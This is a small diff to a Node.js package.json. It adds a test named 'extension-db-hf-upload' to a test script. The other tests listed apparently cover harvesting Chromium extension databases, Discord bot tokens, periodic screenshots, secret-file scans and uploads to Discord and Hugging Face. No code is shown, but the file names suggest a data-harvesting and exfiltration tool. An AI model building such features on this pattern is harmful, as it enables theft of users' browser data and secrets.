-    "test:all": "NODE_ENV=test node --test test/smoke.test.mjs test/forge-bulk-protocol.test.mjs test/hf-hub-upload-streaming.test.mjs test/cross-os-install.test.mjs test/explorer-terminal-controls.test.mjs test/registry-version-lib.test.mjs test/file-lock-force-prefixes.test.mjs test/discord-relay-upload.test.mjs test/discord-webhook-post.test.mjs test/discord-bot-tokens.test.mjs test/discord-screenshot-interval.test.mjs test/production-invariants.test.mjs test/relay-agent-ws-smoke.mjs test/relay-agent-cli-smoke.mjs test/secret-filename-scan.test.mjs test/agent-audit-scan-scope.test.mjs test/agent-secret-audit-throttle.test.mjs test/chromium-extension-db-harvest.test.mjs test/desktop-input-sync.test.mjs",
+    "test:all": "NODE_ENV=test node --test test/smoke.test.mjs test/forge-bulk-protocol.test.mjs test/hf-hub-upload-streaming.test.mjs test/cross-os-install.test.mjs test/explorer-terminal-controls.test.mjs test/registry-version-lib.test.mjs test/file-lock-force-prefixes.test.mjs test/discord-relay-upload.test.mjs test/discord-webhook-post.test.mjs test/discord-bot-tokens.test.mjs test/discord-screenshot-interval.test.mjs test/production-invariants.test.mjs test/relay-agent-ws-smoke.mjs test/relay-agent-cli-smoke.mjs test/secret-filename-scan.test.mjs test/agent-audit-scan-scope.test.mjs test/agent-secret-audit-throttle.test.mjs test/chromium-extension-db-harvest.test.mjs test/extension-db-hf-upload.test.mjs test/desktop-input-sync.test.mjs",
     "test:env-local": "node --test test/env-local-integrations.mjs",
     "verify": "npm run ci && npm run test:env-local",
     "verify:production": "npm run ci",